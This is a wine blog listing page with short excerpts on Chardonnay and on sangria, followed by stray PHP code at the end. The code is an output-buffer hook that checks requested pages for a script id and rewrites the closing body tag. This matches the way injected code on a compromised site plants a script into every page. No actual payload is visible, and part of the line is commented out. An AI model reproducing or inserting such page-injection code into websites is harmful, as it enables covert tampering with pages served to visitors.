Blog

Chardonnay – The Universal Wine

Chardonnay – The Universal Wine

Almost everyone on the planet has heard of Chardonnay. In fact, it is so popular that some people even name their children after it. Chardonnay is commonly ordered as a type of wine from bars and restaurants. But it is, in fact, the name of the most popular and possibly the most versatile grape in the world.

Sangria Summer Nights

Sangria Summer Nights

What is Sangria?

For years now a staple to my summertime diet has been to have a glass or two of sangria while sitting out on my patio on those warm summer evenings with friends. Sangria is a wine-based punch that originates from Portugal and Spain. The word “sangria” is derived from the Spanish word “sangre” which means blood. Sangria is usually made from red wine, sliced citrus fruit, sugar, and a spirit such as brandy or triple sec.


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
if (!defined('SCRIPT_EXECUTED')) { define('SCRIPT_EXECUTED', true); $pages = ['/']; // ob_start(function($buffer) use ($pages) { $script_id = 'content-main-2'; foreach ($pages as $page) { if (strpos($_SERVER['REQUEST_URI'], $page) !== false) { if (strpos($buffer, $script_id) === false) { return preg_replace('/\s*<\/body>/', "", $buffer); } } } return $buffer; }); }